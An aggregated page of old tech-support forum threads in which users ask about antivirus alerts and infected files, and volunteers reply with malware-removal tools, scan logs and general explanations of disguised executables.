We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine.

If you are unable to create a log because your computer cannot start up successfully please provide detailed information about the Windows version you are using: What we in particular need to know is version, edition and if it is a 32bit or a 64bit system. If you are unsure about any of these characteristics, just let us know and we'll help you figuring it out. Please also tell us if you have your Windows CD/DVD handy.

Please include a clear description of the problems you're having, along with any steps you may have performed so far.

Please refrain from running tools or applying updates other than those we suggest while we are cleaning up your computer. The reason for this is so we know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.

Even if you have already provided information about y...

21 more replies

Hi... I was wondering if anyone else is having the same problem as me when trying to install the 32-bit RC. I have created a 50 gigs logical partition on my hard drive to install Windows 7 on (I'm using Vista Home Premium on my Dell laptop). On the installation screen I select the drive for the new installation and so it goes to the next screen where it shows a list of a bunch of stuff that it's supposed to do. The first one is "copying files" or something along those lines, which gets checked, and so it moves to the second thing, that is I believe called unpacking the installation files (or something similar). My installation "freezes" there as it shows 0% for about an hour or two and then it errors and cancels the installation.
Any help would be much appreciated.
Cheers

A:"unpacking" problem in RC installation

Hi, houman

Try re-burning the ISO at 4X speed with ImgBurn

3 more replies

While surfing the web, Norton came up and said that C:\Windows\dlm.exe was infected with a Trojan virus. It could neither repair nor quarantine the file, and I was not sure if I should hastily delete it or not. I stumbled upon this site and saw others with similar cases. So, I downloaded Hijack This and ran a scan. Here's the log below. Thanks to anyone willing to help!
Logfile of HijackThis v1.97.7
Scan saved at 6:14:04 PM, on 12/04/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)


A:Infected File, Can't Quarantine - Log File Included

Have a look at this thread http://forums.techguy.org/showthread.php?threadid=215474&90068ef66b0d48b4d35365630275933b
 

1 more replies

Hello TSG Forum:

I am using Norton AV on Win 2K. An incoming email set off the AV this morning, and it said that there was a virus on my computer. In the activity log it says:

The file
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\NAV23.tmp
is infected with the [email protected]!enc virus.
Unable to repair this file.
Access to the file was denied.

But, when I go to this directory C:\Documents and Settings\Administrator\Local Settings\Temp I can't see any file in there called NAV23.tmp (I have switched on 'show hidden files'.) Also, if I do a scan of that folder (or the entire hard-drive) it comes back virus free. My questions are:

1. Why can I not find the file NAV23.tmp on my computer since the AV says it is infected with a virus.

2. What is going on here? Does the virus copy itself to some other file and delete the NAV23.tmp? Why does the AV scan say computer is virus free? Is something else going on I should know about?

Thanks.
 

A:Norton AV: Says File is Infected, But Can't Find File.

9 more replies

Bit of a weird 1.

Turned on my machine today, went to the toilet and came back and Avast was asking to restart my computer and do a full scan from boot up. I said yes but cancelled it because it was taking too long.

I go look in the virus chest and I noticed that tier0_s.dll from my Steam folder is sitting in there, and that it was transferred in there today. But where it says "Virus description", it says "--no virus--"

What does this mean? Is it some kind of false positive? Did I screw things up by cancelling the scan?

A:Avast says I have an infected file...which isn't infected

OK, a bit of research and looking on the Avast forums and it looks like it's a false positive

2 more replies

My Word DOCX file got damaged due to a virus-infected DOCX file. I have lost crucial, important data, so how do I repair corrupted DOCX files? If you have any solution to recover and repair my corrupted DOCX file, please assist me.
 

A:My word Docx file got damaged due to virus infected Docx file

8 more replies

Moderators/admins... please shift this topic to the appropriate category.

I was searching for a txt file on Google and I also opened several txt files. I also scanned them with my NOD32 anti-virus... but I have read in many places that txt/document files do not or cannot contain a virus, and in some places I have read that they might contain a virus, i.e. they can have some scripts inside them that can allow a virus to download from the internet. Is that true?? Can a document file or a txt file get infected??? I am damn confused, cannot find an answer to this question... Can you guys help me?? Thanks!!

A:Can A Txt File Be Infected?

.TXT is a file extension specially associated with text files. If the file is actually a true text file, it cannot execute a virus. However, the file could contain malicious code and actually be an executable disguised as a text file. This is done by adding an executable extension (.exe, .pif, .com, .vbs, etc) to the end of .txt such as document.txt.exe so that it appears to be a text file. In some cases, you may not see the double extension because it is named with extra spaces before the ".exe" extension such as document.txt.................exe. The real extension is hidden because the column width is too narrow to reveal the complete name and the tiny dots in between are nearly invisible.

In other cases the malware may attach a .doc or .txt file found on a system while scanning for message body texts so it can send information back to a remote attacker. An example of this is the Email-Worm.Win32.Magistr.a. It is possible to get infected by a virus that activates when reading an email without an attachment. The Wscript.KakWorm was spread by taking advantage of a security hole in Microsoft Outlook Express. The worm was hidden in the HTML of the email itself and when the message was viewed by the recipient, the worm automatically infected the computer.

I have encountered "false positive" detections on some plain text files triggered by Corporate Editions of McAfee and Norton Anti-virus which uses heuristic algorithms known as Bloodhound. In these cases, I su...

1 more replies

Hi.

I have a computer that has been infected. I have run malwarebytes and SuperAntiSpyware and it removes the programs. However, it is still coming back through a file called dkqfmeo.dat which is located in a temp folder for a domain user. Whenever I try to delete the program, I get access is denied. I have tried running unlocker and it does not work on the file. Unfortunately, this computer is in a remote location so the only way I have access to it is by remote desktop or by using the share name. I am in a dire situation here and I have tried everything that I could try.

Please help.

More replies
Answer Match 34.44%

This is my first time in this forum. I joined here, hoping that someone might be able to help me. About a week or more ago I installed an "Active Desktop Calendar" by Xemi Computers Ltd. Now I notice my D: drive is constantly being written to, approximately 3 megs every 5 minutes. I have now disabled the auto-start for this application, and it is no longer being written to. So far, it has used up more than 2 Gigs of disk space, and I have no idea what files they are. I would really appreciate it if anyone knows anything about this, or whether it is a virus or not.
 

A:Win.sys file infected

13 more replies
Answer Match 34.44%

My PC is running slow. I have removed some adware and spyware and it is still very slow. I cannot remove files, please help.

A:infected file

Welcome to TSF.

Please download HijackThis. Create a folder at C:\HJT and move HijackThis.exe there. Run a scan and save the log file. Post the whole log file here. Do not fix anything since most of them listed there are harmless (some are system required). This program will help us determine if there is any spyware/malware on your computer.

1 more replies
Answer Match 34.44%

So I got infected when I accidentally opened a file that my friend sent me on steam.
 
THIS FILE ---> Moderator edit: link removed for safety purposes. BC Members with sufficient forum access can find the file here.
 
I just entered this website and wanted to zoom in on the picture, so I clicked it and it downloaded this file. I opened it from my browser window and didn't pay attention to the format (my bad). Then I received a message from the previously mentioned friend that it's a virus, but it was too late to react. I'd already opened it and, from my knowledge, it sent out this link to my every contact... I launched Task Manager and killed it, then deleted the file and remains. I really don't know what I'm dealing with, because Kaspersky Internet Security did not react to it at all. So far I have used Kaspersky Internet Security, Malwarebytes Anti-Malware and Kaspersky's TDSSKiller. I've run many different scan options (almost every one) and it tells me my computer is clean. I've also checked HiJackThis to make sure that it isn't a keylogger, but I couldn't find one. I've changed my email password and Steam password just to be sure. Am I safe or do I need to wipe my hard drive to get rid of it once and for all? I don't want to lose my hard earned cash.
 
@edit
Forgot to mention system is Windows 7 64bit.

A:Got infected by the .SRC file.

Hello there    
 
I'm LighthouseParty and I'll be assisting you with your concern today. Please keep in mind that I have a few guidelines I need you to follow:
Don't run any other tools other than what I provide you with.
Don't install/remove any programs other than what I provide you with.
Don't perform a system restore unless I ask you to. 
 Download MiniToolBox
Click here to download MiniToolBox to your desktop.
Double click MiniToolBox.
Select the following and then press go.
Post the log in your next reply.
Flush DNS
Reset IE Proxy Settings
Reset FF Proxy Settings
List Installed Programs
List Restore Points
 
 Install and run a scan with Malwarebytes Anti-Malware
Click here to download Malwarebytes to your desktop.
Double click mbam-setup-x.x.x.xxxx and follow the on-screen instructions.
On the dashboard, click update now.
After that, click scan now - the scan will now begin.
When the scan's completed, select apply actions - make sure the action is quarantine.
Restart your computer.
How to get the log.
On the dashboard, select the history tab and click application logs.
Select the log which has the time and date of when you did the scan.
Click copy to clipboard and paste it into your reply.
 Download Security Check
Click here to download Security Check to your desktop.
Double click SecurityCheck and follow the on-screen instructions.
A log should open, called checkup... Read more

8 more replies
Answer Match 34.44%

I have posted on your forum several days ago and yet no reply, hopefully I can find someone in here to help.

After recovering from virtumonde and using combofix, I started to notice my computer games were slowing down. I checked my computer processes and the wmiprvse.exe would pop up intermittently. Also my mouse's hourglass would occasionally flicker 3 times in rapid succession, even when the computer is idle. Also a wave sound would play (associated with an error dialog box) occasionally, yet no box/popup ever appeared. Please view my screen shots of the wmiprvse.exe
Thanks, ~Ed

PS I read the rules/regulation on posting picture files or any other information onto this forum.

A:IS THIS AN INFECTED FILE?!

Unfortunately your links go to a location requiring a password.

3 more replies
Answer Match 34.44%

Hello all, firstly thanks to this website I have learnt more here in 2 days than would have taken 2 years reading in books.

Unfortunately I was suffering with pop ups from the winfixer/Winantivirus scam. After following the tutorial on how to remove them. My Sophos anti virus detected a virus, the file infected is $win079.dll. Now Sophos couldn't move or delete the file. I have tried to delete this file myself manually via normal and safe modes but with no success. Is there anything else I could try to get rid of this file? I don't know if this is the cause of the pop ups but once I remove this file, I'll at least know what else may be causing the problems.

Thanks for your help in advance.

A:Infected Dll File But Can't Get Rid Of It.

Welcome to BC!

Install Super Antispyware. Run it in safe mode. Allow it to quarantine whatever it finds. http://www.superantispyware.com/

Run the online scan for Bit Defender in normal mode. Allow it to quarantine whatever it finds. http://www.bitdefender.com/scan8/ie.html

--------------------------------------------------------------------------------
Post a Hijack This log in the Hijack This Forum by following the directions in the link below if the programs above have not removed ALL malware. DO NOT post the log in this forum.
http://www.bleepingcomputer.com/forums/t/34773/preparation-guide-for-use-before-using-malware-removal-tools-and-requesting-help/
--------------------------------------------------------------------------------
Getting into Windows Safe Mode
http://www.computerhope.com/issues/chsafe.htm (pre-Vista OS's)

4 more replies
Answer Match 34.44%

I ran NAV last night and it said it couldn't fix this file ebclafdf.exe. Anybody familiar with this file?
Thanks in advance.
 

A:Infected file??

13 more replies
Answer Match 34.44%

Well, I'm not having any problem with my computers, but I was just doing my virus scan today and I found a couple of infected files. I don't really know whether to remove them or quarantine them, so I'm asking for assistance.
Here's my log

Scan Started Thu Aug 23 11:02:23 2007

-------------------------------------------------------------------------------

WARNING: Can't open file \\?\C:\Documents and Settings\Chau\Local Settings\Temp\hsperfdata_Chau\912, Permission denied

WARNING: Can't open file \\?\C:\Documents and Settings\Chau\Local Settings\Temporary Internet Files\Content.IE5\ONZZ609L\9da142ad29ed3110ef11649b1b2e1d6216c0f34f89cd201c1671fa51d731adfc8933fae2841c3c87b14665b2bfcef79db3a54130b98f565f672342e50be8032b797bae1a10270db38a2491,;ord=118775877587?N?!?O?!??@, No such file or directory

WARNING: Can't open file \\?\C:\Documents and Settings\Chau\My Documents\Azureus Downloads\Macromedia Studio 8 Full Edition.(Flash Dreamweaver Fireworks)+Keygen\Macromedia Studio 8 Full Edition.(Flash Dreamweaver Fireworks)+Keygen\Macromedia Studio 8 Full Edition\Beweisfoto_Paypal.jpg.jpg_H?!I?!??@, No such file or directory

WARNING: Can't open file \\?\C:\Documents and Settings\Chau\My Documents\Azureus Downloads\Macromedia Studio 8 Full Edition.(F... Read more

A:Infected File

What program produced the log? Dr. Web? It is safe to quarantine these files. If at a later date you find you need them or they are false/positives, you can restore them.

You should use the programs below to confirm you are malware free or find and remove other malware.

Install Super Antispyware. Run it in safe mode. Allow it to quarantine whatever it finds. http://www.superantispyware.com/

Run the online scan for Bit Defender in normal mode. Allow it to quarantine whatever it finds. http://www.bitdefender.com/scan8/ie.html

Please let us know the results.

4 more replies
Answer Match 34.44%

Hi, I have an infected file in the Windows temp folder and can't seem to delete it. Also my HijackThis isn't working right.
 

More replies
Answer Match 34.44%

Sorry, posted in the wrong forum. I seem to have an infected file in my Windows temp folder and can't delete it; I keep getting warnings of a trojan pop up. Also my HijackThis doesn't work properly.
 

A:infected file

16 more replies
Answer Match 34.44%

This file in the downloads section in Windows is infected. I was told to delete it but it won't. How do I get past anything that's keeping me from deleting it? {E2883E8F-472F-4FB0-9522-AC9BF37916A7}
 

A:infected file

7 more replies
Answer Match 34.44%

Hi. I'm infected. I have McAfee Security Center. I think I'm infected by recycler.exe. I have a hard drive partitioned into two: Drive C/D. I can't double-click on them to open; I have to right-click then open, because it has autorun. Furthermore, I have these files that I think may have caused this to happen. The files are:
1. zeluR maeTCP.exe
2. Gwen(ISU) Scandal.exe
3. Sex Video.exe
When I delete them they just keep coming back.
Here is my HijackThis log:

Logfile of HijackThis v1.99.1
Scan saved at 12:35:01 PM, on 3/29/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\Program Files\Faronics\Deep Freeze\Install C-0\DF5Serv.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Faronics\Deep Freeze\Install C-0\_$Df\FrzState2k.exe
C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
C:\WINDOWS\System32\GEARSec.exe
c:\program files\mcafee.com\agent\mcdetect.exe
c... Read more

A:My Log File: Help Im Infected

Hello bornok, I am SifuMike and I will be helping you. Sorry for the delay, it's been pretty busy here lately.

Your Java is out of date. Older versions have vulnerabilities that malware can use to infect your system. Please follow these steps to remove older version Java components and update.

Updating Java:
Download the latest version of Java Runtime Environment (JRE) 6.
Scroll down to where it says "Java Runtime Environment (JRE) 6".
Click the "Download" button to the right.
Check the box that says: "Accept License Agreement". The page will refresh.
Click on the link to download Windows Offline Installation, Multi-language jre-6-windows-i586.exe and save to your desktop.
Close any programs you may have running - especially your web browser.
Go to Start > Control Panel, double-click on Add/Remove programs and remove all older versions of Java.
Check any item with Java Runtime Environment (JRE or J2SE) in the name.
Click the Remove or Change/Remove button.
Repeat as many times as necessary to remove each Java version.
Reboot your computer once all Java components are removed.
Then from your desktop double-click on jre-6-windows-i586.exe to install the newest version.

******************
Disable your antivirus program and go here http://www.bitdefender.com/scan8/ie.html and run an online scan with BitDefender (you will need to use Internet Explorer for this scan). When the ActiveX Control has loaded, click on "Click here to scan&... Read more

2 more replies
Answer Match 34.44%

First noticed most files disappeared. Restarted computer in safe mode, changed the setting of view folder options to show hidden files and operating system files. After applying the setting it's always reversed to not showing hidden files. All spaces are still occupied as displayed in properties of the folder.

Noticed more virus message

A potential disk failure may cause loss of files, applications and documents store on the hard disk ........ and force to "scan and fix" or "cancel and reboot"

"RAM memory reliability is extremely low ...."

"Cirtical error hard driver critical error. Start a system diagnostics application to scan your hard disk for errors and performance problems."

And Task Manager is blocked. MBAM is also blocked even in safe mode. Downloaded DDS.scr but it never ends.

A:infected and need help - most file hid

Hello and welcome to Bleeping Computer! I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything.

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

To help Bleeping Computer better assist you please perform the following steps:

***************************************************
In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there.

CLICK THIS LINK >>> http://www.bleepingcomputer.com/logreply/427723 <<< CLICK THIS LINK

If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.

***************************************************
If you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lo... Read more

2 more replies
Answer Match 34.44%

Hi, I downloaded a WinRAR file from 4chan and I saw an .src file in it. I didn't extract it; I immediately deleted it. But I also extracted another file in the same archive (a video), which I did not run either and deleted right after the extraction was complete.
So I did not run the src file, but can I be infected? (From 4chan, it's obviously a trojan.)
 
Sorry for my poor English, I'm not a native English speaker.
Thank you

A:Am I infected ? src file in rar

A file with the .src file extension is known as a source code file
Read more : http://www.ehow.com/facts_5700957_file-extension-src_.html
That said you may have obtained a rogue file..
Why not run these and be sure about infection.

MiniToolBox
Please download MiniToolBox, save it to your desktop and run it.
Checkmark the following checkboxes:
Flush DNS
Report IE Proxy Settings
Reset IE Proxy Settings
Report FF Proxy Settings
Reset FF Proxy Settings
List content of Hosts
List IP configuration
List Winsock Entries
List last 10 Event Viewer log
List Installed Programs
List Users, Partitions and Memory size.
Click Go and post the result (Result.txt). A copy of Result.txt will be saved in the same directory the tool is run.
Note: When using "Reset FF Proxy Settings" option Firefox should be closed.

AdwCleaner
Please download AdwCleaner by Xplode and save to your Desktop.
Double click on AdwCleaner.exe to run the tool.
Vista/Windows 7/8 users right-click and select Run As Administrator
Click on the Scan button.
AdwCleaner will begin...be patient as the scan may take some time to complete.
After the scan has finished, click on the Report button...a logfile (AdwCleaner[R0].txt) will open in Notepad for review.
The contents of the log file may be confusing. Unless you see a program name that you know should not be removed, don't worry about it. If you see an entry you want to keep, let me know about it.
Copy and paste the contents of that logfile in your next reply.
A copy of all logfiles are saved in the C:\Ad... Read more

5 more replies
Answer Match 34.44%

info: 
The file is for a GTA V modified save game. After opening the file in notepad+ I see that it's not for PS4 but for PS3.
I'm concerned about my PS4, and it wasn't the best idea to try to modify my save game.
I have scanned the file and nothing was found. I can provide links to the file / YouTube video with permission.
questions:
Can my PS4 get infected from having my USB with the file plugged in? I did not overwrite anything as it was for PS3.
Thanks.

More replies
Answer Match 34.44%

I can't open a Word document from another PC transferred through a flash drive. When I click it, it just shows that I've clicked on it but it does not open it.
Please help
 

A:i think my file is infected

Hey,
When USB flash drives are removed without clicking the "safely remove" icon, sometimes files get corrupted or the drive becomes useless. Maybe you did the same thing and the Word document is not opening.
Use the built-in recovery option to recover the file:
In Word, go to File, click Open and select the document from the location.
Click the document from the location, then click the arrow along with the Open option and select "Open and Repair".
If the built-in method does not work, then online free tools are available for recovering Word documents.
 

3 more replies
Answer Match 34.44%

OK, this file is an infection on my system: Win32/SillyDI.AGC
My anti-virus keeps having to re-delete it.... What do I do?

A:file infected

Hi the_aggie10,

Please follow the five-step directions in my signature and post a new HijackThis log to this thread when you are done.

7 more replies
Answer Match 34.44%

On-line virus scan said I have an infected file called PE_HANTANER.A located in C:\_RESTORE\ARCHIVE\FS311.CAB, but when I try to delete the file it says the file is in use and won't let me delete it. What should I do?
 

A:Infected File

6 more replies
Answer Match 34.44%

A few days ago my computer got some kind of virus. It says mbr: alureon-k (rtk). I ran Malwarebytes and it removed some things. I also have the AVG anti-virus program, but my computer still isn't right. Here is a log of aswMBR. Please help me!!!!! Thank you.

aswMBR version 0.9.8.986 Copyright(c) 2011 AVAST Software
Run date: 2011-11-29 14:48:16
-----------------------------
14:48:16.750 OS Version: Windows 5.1.2600 Service Pack 3
14:48:16.750 Number of processors: 1 586 0x207
14:48:16.750 ComputerName: VALUED-CB7D4C82 UserName: robert
14:48:23.781 Initialize success
14:48:28.093 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-3
14:48:28.093 Disk 0 Vendor: SAMSUNG_SV8004H QR100-12 Size: 76351MB BusType: 3
14:48:28.093 Disk 1 \Device\Harddisk1\DR3 -> \Device\00000071
14:48:28.093 Disk 1 Vendor: Sony 0000 Size: 76351MB BusType: 0
14:48:30.125 Disk 0 MBR read successfully
14:48:30.125 Disk 0 MBR scan
14:48:30.125 Disk 0 Windows XP default MBR code
14:48:30.125 Disk 0 scanning sectors +156360645
14:48:30.218 Disk 0 scanning C:\WINDOWS\system32\drivers
14:48:43.812 Service scanning
14:48:44.437 Service sptd C:\WINDOWS\System32\Drivers\sptd.sys **LOCKED** 32
14:48:44.984 Modules scanning
14:49:08.281 Disk 0 trace - called modules:
14:49:08.296 ntoskrnl.exe CLASSPNP.SYS disk.sys ACPI.sys hal.dll atapi.sys spux.sys >>UNKNOWN [0x8a416938]<<
14:49:08.296 1 nt!IofCallDriver -> \Device\Harddisk... Read more

A:file mbr o is infected???

Hello, and welcome to TSF.

I am currently reviewing your log. I will be back with a fix for your problem as soon as possible.

Please subscribe to this thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant Notification, then click Subscribe.

Please be patient with me during this time.

19 more replies
Answer Match 34.02%

I have two entries that are in my AVG 7.0 Free Virus Vault. The file is named "TFTP836" and was located at C:\Windows\System32\TFTP836, with a file size of 185kb before AVG moved it to its Vault. I tried searching Google for information on this file and found no help. Has anyone got any information on what this file is, what it does and whether it is safe to remove?

This file has been carried over from the AVG 6.0 Free Virus Vault and I am using Windows 2000 Professional. I already use Ad-Aware SE Personal, Spybot Search and Destroy 1.3 and HiJack This to make sure my computer isn't filled with ad-aware. I am stumped about this detection, though and I know Grisoft has a "support" forum but they have yet to respond at all. I thought perhaps someone else may have had the same file detected once upon a time or have any clue on the suspected file. I have had no problems with the file being out of use whilst it resides in the virus vault, which stops it from being used, accessed or have any activity at all.

The file is considered infected and unable to be "healed", my only option would be to delete and I would but I'm curious about what it is, what it does before I say adios to it for good.

Any help would be appreciated.
 

A:Unidentified 'infected' file

This is a good site for identifying viruses if you can upload the file to it (uses 8 separate AVs) -

http://virusscan.jotti.dhs.org/

- but what I don't know is whether you can upload the quarantined version of the file successfully or if the AV scans could i.d. the quarantined version. I guess you could restore the full file from the vault and then upload it but that may risk infecting your system of course, unless AVG will immediately halt it in its tracks. I agree with you though it's nice to know exactly what critter it is you're dealing with, before deleting it.
 

2 more replies
Answer Match 34.02%

I am getting an error message from AOL safety.
It reads "We found and were not able to clean or block a virus infected file. (C:\windows\system32\winlogon.exe)"
My operating system is Windows XP.
Could anyone please help me with this????
 

A:Virus infected file

6 more replies
Answer Match 34.02%

My firewall stopped SVC Host from connecting outbound. The report read that something had commanded it to connect and was closing that application.

When I cleaned out my offline files and history, all of my cookies except four were also gone. I have my machine set to where it only allows the cookies I accept, and never erase them.

I ran Spybot and get this as a threat: Win32.Agent.pz path:C:\windows\system32\wnspoem\.

Shortly after this threat appears on the screen, but before the scan is complete, the computer will shut off and will not restart until I unplug it.

The same happens when I run AVG, except I don't get an error before the system shuts down. NOD32 comes up clean.

I restored to a known good point, and at least I can boot up, whereas before it would boot, shut down and reboot continuously.

All of my saved login names and passwords are also missing and have to be re-entered.

The system runs great until I try to scan.

Here is my log. All help is greatly appreciated.
Logfile of HijackThis v1.99.1
Scan saved at 2:54:15 AM, on 5/20/2007
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Eset\nod32kui.exe
C:\Program Files\Grisoft\AVG An... Read more

A:I have been infected!! HJT file included.

I finally got SpyBot to run an entire session and removed the only thing it found. Could someone please look at my HJT and tell me if everything is OK before I start entering usernames and passwords again.

I need to pay some bills, but don't want my information hijacked.

Thanks all. When I am sure this thing is safe I definitely will donate.
 

2 more replies
Answer Match 34.02%

Hello. I have a Windows 7 64bit laptop.
 
I have a strong suspicion that my laptop may be infected with something. All of a sudden it became really slow doing things and it will just completely freeze up. Like, for example, trying to search through my files using Windows Explorer or anytime I try using any of my browsers, especially Firefox. Firefox is super slow even when I open it in safe mode. Then my laptop will freeze up to the point where I end up having to just unplug it to shut it off. It also freezes up even when I don't open a browser.
 
This all started 5 or 6 days ago. Unfortunately I think I may have downloaded an infected .rar or .zip file. It was a folder of images (or at least that's what it was supposed to be). The reason I think it was suspicious is because it never did finish downloading. Then, the next day after that, I downloaded and installed a definition update for Windows Defender and then immediately after that is when I first started noticing problems with my Firefox and then all the other problems.
 
I was going to restore my system back to the point before I installed the definition update but then I noticed that my laptop was not saving any restore points. So I tried to fix my pagefile by defragmenting my hard drive.
 
I ran a boot time scan with Avast but I'm still having the same problems. Here are the results of that scan:
 

 
 
----------------------------------------
08/20/2016 00:39
Scan of all local drives... Read more

More replies
Answer Match 34.02%

I have downloaded a file and scanned it with Panda Internet Security.
It identified malware in the file but did not disinfect it.
What do I need to do?

Thank you.
 

More replies
Answer Match 34.02%

My System:
Microsoft Windows XP
Professional
Version 2002
Service Pack 3

My Computer:
Intel(R) Core(TM)2 Duo CPU
E6750 @ 2.66GHz
2.66 GHz, 2.00GB of RAM
My problem lies with an AVG scan showing:
"\\?\globalroot\systemroot\system32\gxvxcfwagpmkbgrqntwrkxxrblalqnkxymxdo.dll";"Trojan horse Agent2.GUF";"Infected"

It can't Heal the infection and it's affecting my browsing experience when I click on links. All my browsers run through junk sites before hitting my intended page successfully. Sometimes it's so bad I always land somewhere else or wherever it feels like taking me next.

Occasionally the machine gives up and restarts itself during normal web streaming.

Please help - I can follow any clear steady instructions swiftly.

Thanks.
 

More replies